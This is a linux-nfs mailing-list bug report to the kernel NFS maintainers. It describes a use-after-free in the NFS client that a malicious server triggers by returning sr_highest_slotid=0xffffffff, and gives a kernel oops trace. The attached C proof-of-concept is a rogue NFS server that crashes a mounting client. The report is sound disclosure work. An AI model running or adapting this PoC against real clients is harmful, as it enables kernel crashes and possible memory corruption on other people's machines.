public inbox for linux-nfs@vger.kernel.org
 help / color / mirror / Atom feed
From: rtm@csail.mit.edu
To: Trond Myklebust <trond.myklebust@hammerspace.com>,
	Anna Schumaker <anna.schumaker@netapp.com>
Cc: linux-nfs@vger.kernel.org
Subject: NFS client can use slot after it is kfree()ed
Date: Sun, 07 Nov 2021 04:57:15 -0500	[thread overview]
Message-ID: <33492.1636279035@crash.local> (raw)

[-- Attachment #1: Type: text/plain, Size: 2509 bytes --]

If the server returns sr_highest_slotid=0xffffffff in an OP_SEQUENCE
reply, nfs41_set_server_slotid_locked() will cause all the slots to be
kfree()ed, including the one that's in use. nfs41_release_slot() will
then dereference pointers extracted from the free'd slot, and possibly
crash. 0xffffffff is special due to this code:

        nfs4_shrink_slot_table(tbl, highest_slotid + 1);

I've attached a program that demonstrates the bug. My machine has
slub_debug=FZP.

# uname -a
Linux (none) 5.15.0-rc7-dirty #19 SMP Sat Nov 6 12:55:40 UTC 2021 riscv64 riscv64 riscv64 GNU/Linux
# cc nfs_3.c
# ./a.out
...
[   18.969075] Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b6b68
[   18.983273] Oops [#1]
[   18.988716] Modules linked in:
[   18.996151] CPU: 0 PID: 60 Comm: mount.nfs Not tainted 5.15.0-rc7-dirty #16
[   19.008294] Hardware name: ucbbar,riscvemu-bare (DT)
[   19.017541] epc : nfs41_release_slot+0x20/0xc8
[   19.026918]  ra : nfs41_sequence_done+0x22/0x34
[   19.036245] epc : ffffffff802206ac ra : ffffffff80225a7a sp : ffffffd00057b7f0
...
[   19.183462] status: 0000000200000121 badaddr: 6b6b6b6b6b6b6b68 cause: 000000000000000d
[   19.198066] [<ffffffff802206ac>] nfs41_release_slot+0x20/0xc8
[   19.210683] [<ffffffff80225a7a>] nfs41_sequence_done+0x22/0x34
[   19.223249] [<ffffffff80226b5e>] nfs41_call_sync_done+0xe/0x16
[   19.235828] [<ffffffff8071a328>] rpc_exit_task+0x26/0x74
[   19.246807] [<ffffffff8071a4b0>] __rpc_execute+0x76/0x216
[   19.257785] [<ffffffff8071aace>] rpc_execute+0x58/0x7e
[   19.268764] [<ffffffff80713358>] rpc_run_task+0x12c/0x16c
[   19.279683] [<ffffffff80220a52>] nfs4_call_sync_custom+0x12/0x32
[   19.292304] [<ffffffff8022388a>] _nfs41_proc_secinfo_no_name.isra.0+0xca/0x13a
[   19.306944] [<ffffffff8022886c>] nfs41_find_root_sec+0xc6/0x228
[   19.319538] [<ffffffff8022bf2e>] nfs4_proc_get_rootfh+0x26/0x9a
[   19.332128] [<ffffffff80248396>] nfs4_get_rootfh+0x40/0xbc
[   19.343070] [<ffffffff80248a5a>] nfs4_server_common_setup+0x1ac/0x1be
[   19.356076] [<ffffffff802498e6>] nfs4_create_server+0x16c/0x208
[   19.368654] [<ffffffff8024161e>] nfs4_try_get_tree+0x16/0x4c
[   19.381247] [<ffffffff80218bac>] nfs_get_tree+0x34a/0x3ac
[   19.392176] [<ffffffff8012bce4>] vfs_get_tree+0x18/0x88
[   19.403092] [<ffffffff8014a28e>] path_mount+0x4f4/0x77a
[   19.414080] [<ffffffff8014a560>] do_mount+0x4c/0x7e
[   19.424644] [<ffffffff8014a912>] sys_mount+0xca/0x14e
[   19.435623] [<ffffffff80003046>] ret_from_syscall+0x0/0x2


[-- Attachment #2: nfs_3.c --]
[-- Type: application/octet-stream, Size: 7157 bytes --]

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <assert.h>

#define NAA 64
unsigned long long aa[NAA] = { 0, 0, 0, 0, 0xffffffff, 0 };
int aai = 0;

char ibuf[4096];
int ilen = 0;
int ii = 0;
char obuf[4096];
int oi = 0;

int readn(int fd, void *xbuf, int n) {
  char *buf = (char *) xbuf;
  int orig = n;
  while(n > 0){
    int cc = read(fd, buf, n);
    if(cc <= 0) { perror("read"); return -1; }
    n -= cc;
    buf += cc;
  }
  return orig;
}

unsigned int
parse32()
{
  if(ii >= ilen){
    printf("parsed beyond the end of the input\n");
    return 0;
  }
  unsigned int x = *(int*)(ibuf+ii);
  ii += 4;
  return ntohl(x);
}

unsigned long long
parse64()
{
  unsigned long long hi = parse32();
  unsigned long long lo = parse32();
  return (hi << 32) | lo;
}

// sessionid4 -- 16 bytes
void
parse_sid(char *sid)
{
  for(int i = 0; i < 16; i++){
    if(sid)
      sid[i] = ibuf[ii];
    ii++;
  }
}

unsigned int
parse_opaque(char *buf)
{
  if(buf)
    buf[0] = 0;
  int nominal_n = parse32();
  if(nominal_n > 4096){
    printf("crazy opaque length %d\n", nominal_n);
    return 0;
  }
  int real_n = nominal_n;
  while((real_n%4) != 0) real_n += 1;
  for(int i = 0; i < real_n; i++){
    if(buf)
      buf[i] = ibuf[ii];
    ii++;
  }
  if(buf)
    buf[nominal_n] = 0;
  return nominal_n;
}

void
put32(unsigned int x)
{
  assert((oi % 4) == 0);
  *(int*)(obuf+oi) = htonl(x);
  oi += 4;
}

void
put64(unsigned long long x)
{
  put32(x >> 32);
  put32(x);
}

void
put_opaque(int n, char *buf)
{
  put32(n);
  for(int i = 0; i < n; i++)
    obuf[oi++] = buf[i];
  while((n%4)!=0){
    obuf[oi++] = 0;
    n++;
  }
}

void
put_sid(char *sid)
{
  for(int i = 0; i < 16; i++){
    obuf[oi++] = (sid ? sid[i] : 0);
  }
}

void
parse_nop()
{
}

void
parse_op_exchange_id()
{
  parse32(); // verifier4, first half
  parse32(); // verifier4, second half
  parse_opaque(0); // eia_clientowner
  int cflags = parse32(); // eia_flags
  parse32(); // state_protect4_a.spa_how, assume SP4_NONE
  int nimpl = parse32(); // length of client_impl_id
  for(int impli = 0; impli < nimpl; impli++){
    char junk[512];
    parse_opaque(junk); // nii_domain
    // printf("nii_domain: %s\n", junk);
    parse_opaque(junk); // nii_name
    // printf("nii_name: %s\n", junk);
    parse64(); // 1/2 of nfstime4
    parse32(); // 1/2 of nfstime4
  }

  // finish EXCHANGE_ID4res
  put32(0); // eir_status = NFS4_OK
  put64(1); // clientid4
  put32(1); // sequenceid4
  int sflags = 0x103 | 0x10000; // EXCHGID4_FLAG_USE_NON_PNFS
  put32(sflags); // eir_flags
  put32(0); // state_protect4_r.spr_how = SP4_NONE
  put64(1); // server_owner4.so_minor_id
  put32(4); // length of so_major_id<>
  put32(0x11223344); // so_major_id<>
  put32(4); // length of eir_server_scope
  put32(0x11223344);
  put32(1); // length of eir_server_impl_id<1>
  put32(4); // nfs_impl_id4.nii_domain
  put32(0x11223344);
  put32(4); // nfs_impl_id4.nii_name
  put32(0x11223344);
  put64(0); // nii_date 1/2
  put32(0); // nii_date 2/2
}

void
parse_op_create_session()
{
  parse64(); // csa_clientid
  int seq = parse32(); // csa_sequence
  parse32(); // csa_flags
  // csa_fore_chan_attrs, csa_back_chan_attrs
  int attrs[2][6];
  for(int i = 0; i < 2; i++){
    for(int j = 0; j < 6; j++){
      attrs[i][j] = parse32();
    }
    parse_opaque(0); // ca_rdma_ird<1>
  }

  put32(0); // OK
  for(int i = 0; i < 4; i++)
    put32(1); // csr_sessionid i/4
  put32(seq); // csr_sequence
  put32(0x3); // csr_flags

  for(int i = 0; i < 2; i++){
    for(int j = 0; j < 6; j++)
      put32(attrs[i][j]);
    put32(0); // ca_rdma_ird
  }
}

void
parse_op_sequence()
{
  char sid[16];

  parse_sid(sid); // sa_sessionid
  int seq = parse32(); // sa_sequenceid
  int slotid = parse32(); // sa_slotid
  int hislot = parse32(); // sa_highest_slotid
  parse32(); // sa_cachethis

  put32(0); // OK
  put_sid(sid); // sr_sessionid
  put32(seq); // sr_sequenceid
  int x1 = aa[aai++];
  int x2 = aa[aai++];
  int x3 = aa[aai++];
  put32(x1); // sr_slotid
  put32(x2); // sr_highest_slotid
  put32(x3); // sr_target_highest_slotid
  put32(0); // sr_status_flags
}

void parse_compound()
{
  char tag[512];
  int taglen = parse_opaque(tag); // tag
  parse32(); // minor version
  int nops = parse32();
  printf("%d ops\n", nops);

  // start a COMPOUND4res
  put32(0); // nfsstat4 = NFS4_OK
  put_opaque(taglen, tag);
  put32(nops); // length of resarray<>
  
  for(int opindex = 0; opindex < nops && oi < ilen; opindex++){
    int op = parse32();
    printf("op %d\n", op);
    put32(op); // resop in nfs_resop4
    if(op == 42){
      parse_op_exchange_id();
    } else if(op == 43){
      parse_op_create_session();
    } else if(op == 53){
      parse_op_sequence();
    } else {
      printf("unknown op %d\n", op);
      // cannot continue to the next op since
      // we don't know how long this one is.
      break;
    }
  }
}

void
parse_rpc()
{
  // SUN RPC
  int xid = parse32();
  parse32(); // mtype=CALL
  parse32(); // rpc version
  parse32(); // prog#
  parse32(); // prog vers
  int proc = parse32();
  parse32(); // cred type
  parse_opaque(0); // cred
  parse32(); // verf type
  parse_opaque(0); // verf

  put32(xid);
  put32(1); // REPLY
  put32(0); // MSG_ACCEPTED
  put32(0); // opaque_auth flavor = AUTH_NULL
  put32(0); // opaque_auth length
  put32(0); // SUCCESS

  if(proc == 0){
    parse_nop();
  } else if(proc == 1){
    parse_compound();
  } else {
    printf("unknown rpc proc %d\n", proc);
  }
}

int
main(){
  struct rlimit r;
  r.rlim_cur = r.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &r);

  int s = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in sin;
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(2049);
  int yes = 1;
  setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes));
  if(bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0){
    perror("bind"); exit(1);
  }
  listen(s, 10);

  int pid1 = fork();
  if(pid1 == 0){
    close(s);
    if(system("echo -n mount: ; mount 127.0.0.1:/tmp /mnt") == 0){
      system("echo -n ls: ; ls -l /mnt/. /mnt/z");
      system("echo -n echo: ; echo hi > /mnt/x");
      system("echo -n umount: ; umount /mnt");
    }
    exit(0);
  }

  int pid2 = fork();
  if(pid2 == 0){
    socklen_t sinlen = sizeof(sin);
    printf("calling accept\n");
    int s1 = accept(s, (struct sockaddr *) &sin, &sinlen);
    printf("accept returned %d\n", s1);
    if(s1 < 0) { perror("accept"); exit(1); }
    close(s);
  
    while(1){
      if(readn(s1, &ilen, 4) < 0) break;
      ilen = ntohl(ilen);
      ilen &= 0x7fffffff;
      if(readn(s1, ibuf, ilen) < 0) break;
      oi = ii = 0;
      memset(obuf, 0, sizeof(obuf));
      put32(0); // place-holder for length
      parse_rpc();
      *(int*)(obuf+0) = htonl((oi - 4) | 0x80000000);
      if(write(s1, obuf, oi)<=0) perror("write");
    }
    exit(1);
  }
  close(s);
  sleep(7);
  if(system("dmesg | grep 'unhandled sig'") == 0){
   printf("unhandled signal\n"); while(1){}
  }
}

                 reply	other threads:[~2021-11-07  9:57 UTC|newest]

Thread overview: [no followups] expand[flat|nested]  mbox.gz  Atom feed

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=33492.1636279035@crash.local \
    --to=rtm@csail.mit.edu \
    --cc=anna.schumaker@netapp.com \
    --cc=linux-nfs@vger.kernel.org \
    --cc=trond.myklebust@hammerspace.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox